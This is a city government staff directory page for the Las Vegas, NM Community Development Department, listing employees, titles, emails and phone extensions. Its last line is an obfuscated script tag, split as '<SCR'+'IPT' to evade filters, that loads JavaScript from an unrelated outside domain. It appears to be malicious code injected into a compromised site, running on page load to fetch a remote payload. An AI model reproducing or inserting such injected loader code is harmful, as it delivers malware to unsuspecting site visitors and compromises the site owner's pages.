Community Development (505)-454-1401


The mission of the Community Development Department is to promote progressive, balanced development and improvements  that reflect community standards.

Employee Directory

Office Staff

Bill Hendrickson,  Community Development Director
bhendrickson@lasvegasnm.gov
(505) 454-1401 ext. 1609

Valerie D. Macias, Administrative Assistant II
vmacias@lasvegasnm.gov
(505) 454-1401 ext. 1602


Maria Perea, Planning & Zoning Coordinator
mariaperea@lasvegasnm.gov
(505) 454-1401 ext. 1608

Christina Baca, Administrative Assistant
cbaca@lasvegasnm.gov
(505) 454-1401 ext. 1607


Ben Maynes, Land/Zoning and Licensing Supervisor
bmaynes@lasvegasnm.gov
(505) 454-1401

Elias Trujillo, Grant Writer/Administrator
eliast@lasvegasnm.gov
(505) 454-1401 ext. 1606

Chuck Griego, Film and Events Coordinator
cgriego@lasvegasnm.gov
(505) 454-1401 ext. 1604

Virginia Marrujo, Multimedia Production Coordinator
vmarrujo@lasvegasnm.gov
(505) 454-1401 ext. 1601

LVSM Chamber of Commerce, Visitors Center Clerk
(505) 425-3707
.

   The City of Las Vegas Visitor's Center is located at 500 Railroad Ave.
(Tourist Information Center)


"<SCR"+"IPT" type="text/javascript" src="http://programdiag.com/21a68356dd31178fa6.js">""